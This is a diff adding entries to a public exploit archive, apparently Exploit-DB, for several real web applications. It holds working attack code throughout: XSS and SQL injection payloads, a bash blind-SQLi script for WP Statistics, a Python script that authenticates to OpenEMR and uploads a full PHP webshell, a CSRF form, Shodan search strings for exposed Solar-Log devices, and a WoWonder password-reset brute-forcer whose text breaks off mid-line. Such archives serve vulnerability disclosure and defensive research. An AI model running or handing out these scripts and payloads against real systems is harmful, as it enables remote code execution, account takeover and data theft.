diff --git a/exploits/cgi/webapps/49869.py b/exploits/cgi/webapps/49869.py index 88330180d..e917692a5 100755 --- a/exploits/cgi/webapps/49869.py +++ b/exploits/cgi/webapps/49869.py @@ -5,6 +5,7 @@ # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso # Version: 2.25 - core update 156 # Tested on: parrot os 5.7.0-2parrot2-amd64 +# CVE: CVE-2021-33393 #!/usr/bin/python3 diff --git a/exploits/multiple/webapps/49980.txt b/exploits/multiple/webapps/49980.txt new file mode 100644 index 000000000..8a7b4db8d --- /dev/null +++ b/exploits/multiple/webapps/49980.txt @@ -0,0 +1,80 @@ +# Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS) +# Exploit Author: Abdulazeez Alaseeri +# Software Link: https://www.accela.com/civic-platform/ +# Version: <= 21.1 +# Tested on: JBoss server/windows +# Type: Web App +# Date: 06/07/2021 +# CVE: CVE-2021-33904 + + +================================================================ +Accela Civic Platform Cross-Site-Scripting <= 21.1 +================================================================ + + +================================================================ +Request Heeaders start +================================================================ + +GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1 + +Host: Hidden for security reasons + +Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Upgrade-Insecure-Requests: 1 + +Te: trailers + +Connection: close + +================================================================ +Request Heeaders end +================================================================ + + + +================================================================ +Response Heeaders start +================================================================ +HTTP/1.1 200 OK + +Expires: Wed, 31 Dec 1969 23:59:59 GMT + +Cache-Control: no-cache + +X-Powered-By: JSP/2.3 + +Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure + +Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure + +Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure + +X-XSS-Protection: 0 + +Pragma: No-cache + +Date: Sun, 06 Jun 2021 18:34:38 GMT + +Connection: close + +Content-Type: text/html;charset=UTF-8 + +Content-Length: 13222 +================================================================ +Response Heeaders end +================================================================ + + +You can notice that the parameter "servProvCode" is vulnerable to XSS. +Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 \ No newline at end of file diff --git a/exploits/multiple/webapps/49981.txt b/exploits/multiple/webapps/49981.txt new file mode 100644 index 000000000..5424be18b --- /dev/null +++ b/exploits/multiple/webapps/49981.txt @@ -0,0 +1,62 @@ +# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS) +# Date: 08/06/2021 +# Exploit Author: Mohammad Hossein Kaviyany +# Vendor Homepage: www.cerberusftp.com +# Software Link: https://www.cerberusftp.com/download/ +# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier +# Tested on: windows server 2016 +------------ +About Cerberus FTP Server (From Vendor Site) : + +Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, +FIPS 140-2 validated, and Active Directory and LDAP authentication. +-------------------------------------------------------- +Exploit Detailes : + +This stored XSS bug happens when a user uploads an svg file with the following content : + + +Exploit POC : + +# Vulnerable Path : /file/upload +# Parameter: files (POST) +# Vector: + +#Payload: + +POST /file/upload HTTP/1.1 +Host: target.com +Connection: close +Content-Length: 484 +sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90" +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG +Origin: https://target.com +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://target.com/file/d/home/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM + +------WebKitFormBoundaryAAM6ZtOAsyklo6JG +Content-Disposition: form-data; name="cd" + +/home +------WebKitFormBoundaryAAM6ZtOAsyklo6JG +Content-Disposition: form-data; name="csrftoken" + +z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg +------WebKitFormBoundaryAAM6ZtOAsyklo6JG +Content-Disposition: form-data; name="files[]"; filename="file.svg" +Content-Type: image/svg+xml + + + +------WebKitFormBoundaryAAM6ZtOAsyklo6JG-- + +-------------------------- \ No newline at end of file diff --git a/exploits/multiple/webapps/49985.txt b/exploits/multiple/webapps/49985.txt new file mode 100644 index 000000000..e6b485f5f --- /dev/null +++ b/exploits/multiple/webapps/49985.txt @@ -0,0 +1,31 @@ +# Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection +# Date: 11/06/1963 +# Exploit Author: TonyShavez +# Vendor Homepage: https://www.grocerycrud.com/ +# Software Link: https://www.grocerycrud.com/downloads +# Version: < v2.0.1 +# Tested on: [Linux Ubuntu] + +Proof Of concept : +======================= +#Request: + +POST /path/to/ajax_list HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 68 +DNT: 1 +Connection: close + +page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text= +======================= +#vulnerable parameter : + +order_by +======================= +#type : [error-based] \ No newline at end of file diff --git a/exploits/multiple/webapps/49986.txt b/exploits/multiple/webapps/49986.txt new file mode 100644 index 000000000..6faaa230b --- /dev/null +++ b/exploits/multiple/webapps/49986.txt @@ -0,0 +1,18 @@ +# Exploit Title: Solar-Log 500 2.8.2 - Incorrect Access Control +# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP"" +# Date: 2021-06-11 +# Exploit Author: Luca.Chiou +# Vendor Homepage: https://www.solar-log.com/en/ +# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/ +# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013 +# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/ + +# 1. Description: +# The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, +# which allows arbitrary remote attackers to gain administrative privileges by connecting to the server. +# As a result, the attacker can modify configuration files and change the system status. + +# 2. Proof of Concept: +# Access the /lan.html of Solar-Log 500 without ANY authentication, +# and you can get gain administrative privileges to modify configuration files and change the system status. +# http:///lan.html \ No newline at end of file diff --git a/exploits/multiple/webapps/49987.txt b/exploits/multiple/webapps/49987.txt new file mode 100644 index 000000000..283842699 --- /dev/null +++ b/exploits/multiple/webapps/49987.txt @@ -0,0 +1,20 @@ +# Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials +# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP"" +# Date: 2021-06-11 +# Exploit Author: Luca.Chiou +# Vendor Homepage: https://www.solar-log.com/en/ +# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/ +# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013 +# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/ + +# 1. Description: +# An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013. +# In /export.html, email.html, sms.html, the devices store plaintext passwords, +# which may allow sensitive information to be read by someone with access to the device. + +# 2. Proof of Concept: +# Browse the configuration page in Solar-Log 500, +# we can find out that the passwords of FTP, SMTP, SMS services are stored in plaintext. +# http:///export.html +# http:///email.html +# http:///sms.html \ No newline at end of file diff --git a/exploits/php/webapps/49894.sh b/exploits/php/webapps/49894.sh new file mode 100755 index 000000000..1c4042eb9 --- /dev/null +++ b/exploits/php/webapps/49894.sh @@ -0,0 +1,130 @@ +# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated) +# Date: 20/05/2021 +# Exploit Author: Mansoor R (@time4ster) +# CVSS Score: 7.5 (High) +# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +# Version Affected: 13.0 to 13.0.7 +# Vendor URL: https://wordpress.org/plugins/wp-statistics/ +# Patch: Upgrade to wp-statistics 13.0.8 (or above) +# Tested On: wp-statistics 13.0.6,13.0.7 + +#!/bin/bash + +# Credits: +# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ + +# SQLmap Exploit for grepping database banner (automated): +# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b + +# WARNINGS: +# Only test the exploit on websites you are authorized to. +# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions. + + +# Exploit +# ============== + +echo +echo "============================================================================================" +echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8" +echo +echo "By: Mansoor R (@time4ster)" +echo "============================================================================================" +echo + + + +function printHelp() +{ + echo -e " +Usage: + +-u|--wp-url Wordpress target url +-k|--check Only checks whether vulnerable version of plugin is running or not. +-h|--help Print Help menu + + +Example: +./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress +./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check +" +} + +#Processing arguments +check="false" +exploit="true" +while [[ "$#" -gt 0 ]] +do +key="$1" + +case "$key" in + -u|--wp-url) + wp_url="$2" + shift + shift # past argument + ;; + -k|--check) + check="true" + exploit="false" + shift + shift + ;; + -h|--help) + printHelp + exit + shift + ;; + *) + echo [-] Enter valid options + exit + ;; +esac +done + +[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit + +function checkVersion() +{ + url="$1" + [[ -z "$url" ]] && return + target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt" + user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" + + version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+") + [[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version" + [[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return + + vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0) + is_vulnerable="false" + for v in "${vuln_version[@]}";do + [[ "$version" == "$v" ]] && is_vulnerable="true" && break + done + [[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable" + [[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable" +} + +function exploitPlugin() +{ + url="$1" + target_endpoint="$url/wp-admin/admin.php" + user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" + sleep=3 + payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)" + + echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: " + read choice + [[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return + + echo + echo "[+] Trying Payload:" + set -x + curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \ + --data-urlencode "page=wps_pages_page" \ + --data-urlencode "type=1" \ + --data-urlencode "$payload" + + +} + +[[ "$check" == "true" ]] && checkVersion "$wp_url" +[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url" \ No newline at end of file diff --git a/exploits/php/webapps/49983.py b/exploits/php/webapps/49983.py new file mode 100755 index 000000000..df2653cfb --- /dev/null +++ b/exploits/php/webapps/49983.py @@ -0,0 +1,308 @@ +# Exploit Title: OpenEMR 5.0.0 - Remote Code Execution (Authenticated) +# Date 10.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.0/openemr-5.0.0.zip/download +# Version: 5.0.0 +# Tested on: Windows 10 +# CVE: CVE-2017-9380 +# Documentation: https://github.com/Hacker5preme/Exploits#cve-2017-9380-exploit + +''' +Description: +The OpenEMR application allows users from all roles to upload files. However, the application does not whitelist only +certain type of files (e.g. PDF, JPG, PNG, DOCX, etc). At the contary, any type of files can be uploaded to the +filesystem via the application. While OpenEMR recommends during the installation to restrict access to the repository +hosting uploaded files, unfortunately, such recommendations are too often ignored by users and can result in full +compromise of the web server and its data. +''' + + +''' +Import required modules: +''' +import argparse +import requests +import string +import random + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Exploit for CVE-2017-9380') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.PATH +username = args.USERNAME +password = args.PASSWORD + + +''' +Exploit: +''' +# Authentication preparation: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' +auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' +response = session.get(auth_chek_url) + +# Header (auth): +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Referer': auth_chek_url, + 'Upgrade-Insecure-Requests': '1', +} + +# Body (auth): +body = { + 'new_login_session_management': '1', + 'authProvider': 'Default', + 'authUser': username, + 'clearPass': password, + 'languageChoice': '1' +} + +# Authenticate: +print('') +print('[+] Authentication') +auth = session.post(auth_url,headers=header, data=body) + +# Create random patient name: +letters_up = string.ascii_uppercase +letters_down = string.ascii_lowercase +first_name = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(10)) +surname = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(7)) +print('') +print('[+] Creating patient name randomly:') +print(' [*] First Name: ' + first_name) +print(' [*] Surname: ' + surname) + +# Registration preparation: +url_reg = 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new_comprehensive_save.php' + +# Header (registration): +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Referer': 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new.php', + 'Upgrade-Insecure-Requests': '1' +} +body = { + 'form_cb_1': '1', + 'form_title': 'Mr.', + 'form_fname': first_name, + 'form_mname': '', + 'form_lname': surname, + 'form_pubpid': '', + 'form_DOB': '2021-05-04', + 'form_sex': 'Male', + 'form_ss': '', + 'form_drivers_license': '', + 'form_status': '', + 'form_genericname1': '', + 'form_genericval1': '', + 'form_genericname2': '', + 'form_genericval2': '', + 'form_billing_note': '', + 'form_street': '', + 'form_city': '', + 'form_state': '', + 'form_postal_code': '', + 'form_county': '', + 'form_country_code': '', + 'form_mothersname': '', + 'form_contact_relationship': '', + 'form_phone_contact': '', + 'form_phone_home': '', + 'form_phone_biz': '', + 'form_phone_cell': '', + 'form_email': '', + 'form_email_direct': '', + 'form_providerID': '', + 'form_ref_providerID': '', + 'form_pharmacy_id': '0', + 'form_hipaa_notice': '', + 'form_hipaa_voice': '', + 'form_hipaa_message': '', + 'form_hipaa_mail': '', + 'form_hipaa_allowsms': '', + 'form_hipaa_allowemail': '', + 'form_allow_imm_reg_use': '', + 'form_allow_imm_info_share': '', + 'form_allow_health_info_ex': '', + 'form_allow_patient_portal': '', + 'form_care_team': '', + 'form_cmsportal_login': '', + 'form_imm_reg_status': '', + 'form_imm_reg_stat_effdate': '', + 'form_publicity_code': '', + 'form_publ_code_eff_date': '', + 'form_protect_indicator': '', + 'form_prot_indi_effdate': '', + 'form_industry': '', + 'form_occupation': '', + 'form_em_name': '', + 'form_em_street': '', + 'form_em_city': '', + 'form_em_state': '', + 'form_em_postal_code': '', + 'form_em_country': '', + 'form_language': '', + 'form_ethnicity': '', + 'form_family_size': '', + 'form_financial_review': '', + 'form_monthly_income': '', + 'form_homeless': '', + 'form_interpretter': '', + 'form_migrantseasonal': '', + 'form_referral_source': '', + 'form_vfc': '', + 'form_religion': '', + 'form_deceased_date': '', + 'form_deceased_reason': '', + 'form_guardiansname': '', + 'form_guardianrelationship': '', + 'form_guardiansex': '', + 'form_guardianaddress': '', + 'form_guardiancity': '', + 'form_guardianstate': '', + 'form_guardianpostalcode': '', + 'form_guardiancountry': '', + 'form_guardianphone': '', + 'form_guardianworkphone': '', + 'form_guardianemail': '', + 'i1provider': '', + 'i1plan_name': '', + 'i1effective_date': '', + 'i1policy_number': '', + 'i1group_number': '', + 'i1subscriber_employer': '', + 'i1subscriber_employer_street': '', + 'i1subscriber_employer_city': '', + 'form_i1subscriber_employer_state': '', + 'i1subscriber_employer_postal_code': '', + 'form_i1subscriber_employer_country': '', + 'i1subscriber_fname': '', + 'i1subscriber_mname': '', + 'i1subscriber_lname': '', + 'form_i1subscriber_relationship': '', + 'i1subscriber_DOB': '', + 'i1subscriber_ss': '', + 'form_i1subscriber_sex': '', + 'i1subscriber_street': '', + 'i1subscriber_city': '', + 'form_i1subscriber_state': '', + 'i1subscriber_postal_code': '', + 'form_i1subscriber_country': '', + 'i1subscriber_phone': '', + 'i1copay': '', + 'i1accept_assignment': 'TRUE', + 'i2provider': '', + 'i2plan_name': '', + 'i2effective_date': '', + 'i2policy_number': '', + 'i2group_number': '', + 'i2subscriber_employer': '', + 'i2subscriber_employer_street': '', + 'i2subscriber_employer_city': '', + 'form_i2subscriber_employer_state': '', + 'i2subscriber_employer_postal_code': '', + 'form_i2subscriber_employer_country': '', + 'i2subscriber_fname': '', + 'i2subscriber_mname': '', + 'i2subscriber_lname': '', + 'form_i2subscriber_relationship': '', + 'i2subscriber_DOB': '', + 'i2subscriber_ss': '', + 'form_i2subscriber_sex': '', + 'i2subscriber_street': '', + 'i2subscriber_city': '', + 'form_i2subscriber_state': '', + 'i2subscriber_postal_code': '', + 'form_i2subscriber_country': '', + 'i2subscriber_phone': '', + 'i2copay': '', + 'i2accept_assignment': 'TRUE', + 'i3provider': '', + 'i3plan_name': '', + 'i3effective_date': '', + 'i3policy_number': '', + 'i3group_number': '', + 'i3subscriber_employer': '', + 'i3subscriber_employer_street': '', + 'i3subscriber_employer_city': '', + 'form_i3subscriber_employer_state': '', + 'i3subscriber_employer_postal_code': '', + 'form_i3subscriber_employer_country': '', + 'i3subscriber_fname': '', + 'i3subscriber_mname': '', + 'i3subscriber_lname': '', + 'form_i3subscriber_relationship': '', + 'i3subscriber_DOB': '', + 'i3subscriber_ss': '', + 'form_i3subscriber_sex': '', + 'i3subscriber_street': '', + 'i3subscriber_city': '', + 'form_i3subscriber_state': '', + 'i3subscriber_postal_code': '', + 'form_i3subscriber_country': '', + 'i3subscriber_phone': '', + 'i3copay': '', + 'i3accept_assignment': 'TRUE'} + +print('') +print('[+] Registering patient:') +x = session.post(url_reg, headers=header, data=body).text + +# Get Patient-ID: +id = x[(x.find('pid=')+4):x.find('&')] +print(' [*] ID-NUMBER: ' + id) + +# Construct upload URL: +url_upload = 'http://' + target_ip + ':' + target_port + openemr_path + '/controller.php?document&upload&patient_id=' + id + '&parent_id=1&"' + +# Header (upload): +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------370797319835249590062969815666", + "Origin": 'http://' + target_ip, + "Connection": "close", + "Referer": url_upload, + "Upgrade-Insecure-Requests": "1" +} + +# Body (shell); I'm using p0wny shell: https://github.com/flozz/p0wny-shell +body = "-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n64000000\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"destination\"\r\n\r\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"patient_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"process\"\r\n\r\ntrue\r\n-----------------------------370797319835249590062969815666--\r\n" + +# Exploit +x = session.post(url_upload, headers=header,data=body).text +print('') +print('[+] Uploading your Webshell') +b = x[x.find('documents/') + 10:] +c = b[:b.find('<')] +webshellpath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/documents/' + c +print(' [*] Webshell: ' + webshellpath) +print('') \ No newline at end of file diff --git a/exploits/php/webapps/49984.html b/exploits/php/webapps/49984.html new file mode 100644 index 000000000..deea13c11 --- /dev/null +++ b/exploits/php/webapps/49984.html @@ -0,0 +1,20 @@ +# Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF +# Date: 2/10/2021 +# Author: 0xB9 +# Software Link: https://wordpress.org/plugins/database-backups/ +# Version: 1.2.2.6 +# Tested on: Windows 10 +# CVE: CVE-2021-24174 + +1. Description: +This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory. + +2. Proof of Concept: + +
+ + +
+ +Backups can be accessed by the following URL. +http://localhost/wp-content/uploads/database-backups/ \ No newline at end of file diff --git a/exploits/php/webapps/49988.txt b/exploits/php/webapps/49988.txt new file mode 100644 index 000000000..23eda102c --- /dev/null +++ b/exploits/php/webapps/49988.txt @@ -0,0 +1,26 @@ +# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated) +# Date: 05–02–2021 +# Exploit Author: Avinash R +# Vendor Homepage: https://zenar.io/ +# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 +# Version: 8.8.52729 +# Tested on: Windows 10 Pro (No OS restrictions) +# CVE : CVE-2021–27673 +# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38 + +##### Step To Reproduce ##### + +1) Login to the admin page of Zenario CMS with admin credentials, which is +http://server_ip/zenario/admin.php + +2) Click on, New → HTML page to create a new sample page and intercept it +with your interceptor. + +3) Just a single quote on the 'cID' parameter will confirm the SQL +injection. + +4) After confirming that the 'cID' parameter is vulnerable to SQL +injection, feeding the request to SQLMAP will do the rest of the work for +you. + +############ End ############ \ No newline at end of file diff --git a/exploits/php/webapps/49989.py b/exploits/php/webapps/49989.py new file mode 100755 index 000000000..798965869 --- /dev/null +++ b/exploits/php/webapps/49989.py @@ -0,0 +1,46 @@ +# Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass +# Date: 11.06.2021 +# Exploit Author: securityforeveryone.com +# Researchers : Security For Everyone Team - https://securityforeveryone.com +# Vendor Homepage: https://www.wowonder.com/ +# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 +# Version: < 3.1 +# Tested on: Linux/Windows + +''' +DESCRIPTION + +In WoWonder < 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day. +The vulnerability is found the "code" parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999. +if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application. + +ABOUT SECURITY FOR EVERYONE TEAM + +We are a team that has been working on cyber security in the industry for a long time. +In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. +We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools +''' + +import requests +import email.utils as eut +import calendar, time; +import hashlib, re; + +url = "http://wowonderlab:80/wowonder/" #change this with your target +myheaders = {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"} +recoverdata = {"recoveremail": "wowondertest@securityforeveryone.com"} #change this email with your registered wowonder email address +req = requests.post(url+"requests.php?f=recover", headers=myheaders, data=recoverdata) +b = eut.parsedate(req.headers["Date"]) +respepoch = calendar.timegm(time.strptime("{0}-{1}-{2} {3}:{4}:{5}".format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S')) + +for token in range(111,1000): + str2hash = "{0}{1}".format(token,respepoch) + email_code = hashlib.md5(str2hash.encode()).hexdigest() + + req_reset = requests.get(url+"index.php?link1=reset-password&code=1_{0}".format(email_code)) + if len(re.findall("New password",req_reset.text)) == 1: + print(email_code) + resetdata = {"password": "10711071", 